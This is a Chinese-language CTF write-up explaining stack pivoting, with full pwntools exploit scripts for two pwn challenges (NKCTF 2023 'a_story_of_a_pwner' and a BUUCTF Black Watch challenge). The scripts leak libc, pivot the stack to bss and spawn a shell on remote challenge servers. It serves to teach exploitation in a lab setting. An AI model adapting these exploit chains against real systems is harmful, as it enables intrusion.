栈迁移基础——>栈迁移基础
a_story_of_a_pwner
这是NKCTF 2023中的一道题
checksec后IDA看下
题目中有一个菜单,打开各个选项后发现
前三个选项类似,read函数中的都是bss段地址。
而选项四有两种情况
可以看出了puts函数地址可以泄露出来,从而泄露libc,然后在选过123之后再选4进行栈溢出,溢出字节是不够的,所以我们把pop_rdi、sys_addr、binsh地址写入到前三个选项中的bss段
exp:
from pwn import *
io=remote('node2.yuzhian.com.cn',39708)
#io=process('./story')
elf=ELF('./story')
libc=ELF('./libc.so.6')
io.recvuntil("> ")
io.sendline('4')
io.recvuntil("I give it up, you can see this. 0x")
puts_addr=int(io.recv(12),16)
log.success("puts_addr="+hex(puts_addr))
libcbase=puts_addr-libc.sym['puts']
sys_addr=libcbase+libc.sym['system']
binsh=libcbase+next(libc.search(b"/bin/sh"))
pop_rdi=0x401573
leave_ret=0x40139e
io.recvuntil("> ")
io.sendline('2')
io.recvuntil("what's your corment?\n")
io.send(p64(pop_rdi))
io.recvuntil("> ")
io.sendline('1')
io.recvuntil("what's your comment?\n")
io.send(p64(binsh))
io.recvuntil("> ")
io.sendline('3')
io.recvuntil("what's your corMenT?\n")
io.send(p64(sys_addr))
io.recvuntil("> ")
io.sendline('4')
io.recvuntil("now, come and read my heart...\n")
payload=b'a'*10+p64(0x4050A0-0x8)+p64(leave_ret)
io.sendline(payload)
io.interactive()
[Black Watch 入群题]PWN
checksec下
IDA
可以看到有两次read,而且第一次read到了bss段,第二次栈溢出8字节,显然不够构造rop链,所以我们栈迁移到bss段,在第一次输入的时候构造rop链。
但是这里我们需要重复迁移两次,第一次泄露libc,第二次再进行getshell
exp:
from pwn import *
from LibcSearcher import *
#p=process('./spwn')
io=remote('node4.buuoj.cn',29977)
elf=ELF('./spwn')
write_plt=elf.plt['write']
write_got=elf.got['write']
main=0x8048513
bss_addr=0x0804A300
leave_ret=0x08048408
payload=p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4)
io.recvuntil("What is your name?")
io.send(payload)
payload1=b'a'*0x18+p32(bss_addr-4)+p32(leave_ret)
io.recvuntil("What do you want to say?")
io.send(payload1)
write_addr=u32(io.recv(4))
libc=LibcSearcher('write',write_addr)
libc_base=write_addr-libc.dump('write')
sys_addr=libc_base+libc.dump('system')
binsh=libc_base+libc.dump('str_bin_sh')
io.recvuntil("name?")
payload=p32(sys_addr)+p32(0)+p32(binsh)
io.sendline(payload)
io.recvuntil("say?")
io.sendline(payload1)
io.interactive()